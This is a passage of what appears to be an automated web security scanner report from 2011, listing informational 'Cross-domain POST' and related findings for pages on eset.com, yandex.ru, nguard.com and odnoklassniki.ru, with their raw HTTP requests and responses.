Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response 2

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38843
Date: Mon, 25 Apr 2011 12:59:06 GMT
X-Varnish: 1310978471
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
entifying name, server, and channel on
the next lines. */
s.pageName="";
s.server="";
s.channel="Store";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="direct";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//--></script><noscript><div><img src="http://eset.122.2o7.net/b/ss/esetdev/1/H.21.1--NS/0" height="1" width="1" alt="" /></div></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.21.1. -->
<script type="text/javascript" src="/us/scripts/elqNow/elqCfg.js"></script>
<script type="text/javascript" src="/us/scripts/elqNow/elqImg.js"></script>
</body>
</html>

20.8. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d0bfa794%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff259c7ddf8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products?CMP=KNC-g-nbag&gclid=CLzn0qLPt6gCFQl_5Qod4S-RCA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.150.41
X-Cnection: close
Date: Mon, 25 Apr 2011 12:52:48 GMT
Content-Length: 8179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4db56ea051fe32f95192852" class="connect_widget button_count" style="font-family: &quot;segoe ui&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">18K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">18K</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"35053bf7",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:370179,vip:"66.220.149.18",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"jz9sm",lhsh:"c840b",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"AAmvK":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v
...[SNIP]...

Request 2

GET /plugins/like.php?channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d0bfa794%26origin%3Dhttp%253A%252F%252Fwww.eset.com%252Ff259c7ddf8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=segoe%20ui&href=http%3A%2F%2Fwww.facebook.com%2Fesetusa&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=90 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.189.65
X-Cnection: close
Date: Mon, 25 Apr 2011 12:52:58 GMT
Content-Length: 8088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4db56eaa5fd462d39665703" class="connect_widget button_count" style="font-family: &quot;segoe ui&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">18K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">18K</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"e9c33a83",user:0,locale:"en_US",method:"GET",dev:0,start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:370179,vip:"66.220.149.18",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,pc:{"m":"1.0.4","l":"1.0.4","axi":true,"j":true,"bsz":16},fb_dtsg:"jz9sm",lhsh:"c840b",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"AAmvK":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v
...[SNIP]...

21. Cross-domain POST  previous  next
There are 11 instances of this issue:


21.1. http://direct.yandex.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://direct.yandex.ru
Path:   /

Issue detail

The page contains a form which POSTs data to the domain passport.yandex.ru. The form contains the following fields:

Request

GET /?partner HTTP/1.1
Host: direct.yandex.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:35:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host
Content-Length: 25502


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="nojs">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Em
...[SNIP]...
</a><form class="b-domik b-domik_type_popup g-js g-hidden" action="http://passport.yandex.ru/passport?mode=auth&amp;amp;from=direct&amp;amp;retpath=http%3A%2F%2Fdirect.yandex.ru%2Fregistered%2Fmain.pl" method="post"onclick="return {name: 'b-domik_type_popup', title: '', register:'', regMode:''}"
>

<input name="login"/>
...[SNIP]...

21.2. http://nguard.com/contact.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nguard.com
Path:   /contact.aspx

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Request

GET /contact.aspx HTTP/1.1
Host: nguard.com
Proxy-Connection: keep-alive
Referer: http://nguard.com/about.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=74935565.1303735966.2.2.utmgclid=CM2C9p3Pt6gCFUOo4AoduRviBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=74935565.1810353086.1303732835.1303732835.1303735966.2; __utmc=74935565; __utmb=74935565.2.10.1303735966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:09:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12825


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin codeOutsi
...[SNIP]...
<div>
                   
               
                <form action="http://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" method="post" name="conatct" id="conatct" onsubmit="return validateForm();">
               

                                                <p class="copySmallBold" >
...[SNIP]...

21.3. http://nguard.com/security/contact.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nguard.com
Path:   /security/contact.aspx

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

Request

GET /security/contact.aspx HTTP/1.1
Host: nguard.com
Proxy-Connection: keep-alive
Referer: http://nguard.com/vulnerability-assessment/?gclid=CM2C9p3Pt6gCFUOo4AoduRviBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=74935565.1303732835.1.1.utmgclid=CM2C9p3Pt6gCFUOo4AoduRviBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=74935565.1810353086.1303732835.1303732835.1303732835.1; __utmc=74935565

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2948

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact</ti
...[SNIP]...
</ul>
   <form action="http://www.salesforce.com/servlet/servlet.WebToLead?encoding=UTF-8" method="post" name="conatct" id="conatct" onsubmit="return validateSimpleForm();">
       <table width="100%" border="0" cellspacing="1" cellpadding="1" id="tblContact">
...[SNIP]...

21.4. http://odnoklassniki.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odnoklassniki.ru
Path:   /

Issue detail

The page contains a form which POSTs data to the domain www.odnoklassniki.ru. The form contains the following fields:

Request

GET / HTTP/1.1
Host: odnoklassniki.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: CHECK_COOKIE=true; Domain=.odnoklassniki.ru; Expires=Mon, 25-Apr-2011 14:27:36 GMT; Path=/
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Rendered-Blocks: HtmlPage
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 14:26:36 GMT
Content-Length: 13753

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>..........................</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<div class="panelBox_body"><form action="http://www.odnoklassniki.ru/dk?cmd=AnonymLogin&amp;st.cmd=anonymLogin&amp;tkn=6956" method="post"><input value="" type="hidden" name="st.redirect">
...[SNIP]...

21.5. http://www.eset.com/us/home/smart-security  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/home/smart-security

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/home/smart-security HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952767|check#true#1303743227|session#1303743154006-383984#1303745027; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.2.10.1303743158; s_pers=%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%252C%255B%2527Other%252520Referrers-shopping.netsuite.com%2527%252C%25271303743170439%2527%255D%255D%7C1461595970439%3B%20s_visit%3D1%7C1303745017240%3B%20gpv_pageName%3Dus/new_homepage%7C1303745017242%3B%20s_nr%3D1303743217244-Repeat%7C1335279217244%3B%20s_invisit%3Dtrue%7C1303745017246%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedshopping.netsuite.comshopping.netsuite.com%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/new_homepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/home/smart-security%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25484
Date: Mon, 25 Apr 2011 15:17:24 GMT
X-Varnish: 555654660
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
<div class="buy_box_ess">
<form id="ns_form_1" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<div class="windows_box">
...[SNIP]...

21.6. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38877
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977884
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="grey_tabs_content">
<form id="ns_form_1" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...

21.7. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38877
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977884
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="grey_tabs_content" style="display:none;">
<form id="ns_form_3" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...

21.8. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38877
Date: Mon, 25 Apr 2011 12:58:55 GMT
X-Varnish: 1310977884
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
<div class="grey_tabs_content" style="display:none;">
<form id="ns_form_2" action="http://shopping.netsuite.com/app/site/query/additemtocart.nl?n=1&amp;ext=T" method="post">
<table cellspacing="0" cellpadding="0" class="store_table">
...[SNIP]...

21.9. http://www.eset.com/us/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eset.com
Path:   /us/store

Issue detail

The page contains a form which POSTs data to the domain shopping.netsuite.com. The form contains the following fields:

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/business/products
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
